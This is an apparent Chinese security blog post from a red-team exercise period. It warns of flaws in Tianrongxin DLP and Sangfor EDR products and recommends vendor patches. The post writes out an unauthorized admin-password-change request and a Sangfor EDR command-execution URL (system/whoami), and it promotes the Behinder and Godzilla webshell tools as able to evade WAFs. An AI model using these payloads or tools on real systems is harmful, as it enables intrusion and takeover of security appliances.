0day预警,等0day变成nday后继续
给0day一点时间,让它变成Nday后,HW咱们再继续。
天X信漏洞
漏洞影响:已知版本号v3.1130.308p3_DLP.1
风险等级:高
漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
修复==》找官网
palink:
深信XEdr
风险等级:高
https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami
修复==》找官网
据说已经出现的0day汇总:
天擎edr rce
深信服vpn rce
深信服edr rce
天融信dlp unauth
有相关设备的,建议零信任策略。
事实证明安全设备,并不一定保障安全。
红队工具更新==》小心被社工哦!
--------------------------------------------------------------
冰蝎3.0 V1版本
功能进行了更新:
1.去除动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5("admin")[0:16];
2.增加了插件机制,可开发安装自定义扩展插件;
3.UI框架由awt改为javafx,重写了大量逻辑;
4.增强了内网穿透功能,在原有的基于HTTP的socks5隧道基础上,增加了单端口转发功能,可一键将内网端口映射至VPS或者本机端口;
这次更新比计划提前了一个月左右,略有仓促,几个核心功能还没有完工,所以这段时间可能会密集更新:)
冰蝎 3.0 V2版本
新增了jspx、asp版本服务端,修复了aspx服务端;
新增双击打开功能;
修复了路径中有中文导致“找不到数据文件”的问题;
修复了文件管理UI重叠问题;
“设置代理”新增Socks代理连接功能;
-----------------------------------------------------------------------------------------------
哥斯拉,传说任何waf都阻拦不了
https://github.com/BeichenDream/Godzilla
借张图
ps:HW的目的是发现问题,问题越多对于国家网络安全发展事业越好,但是这次的脸打的有点疼,打铁还需自身硬,珍重珍重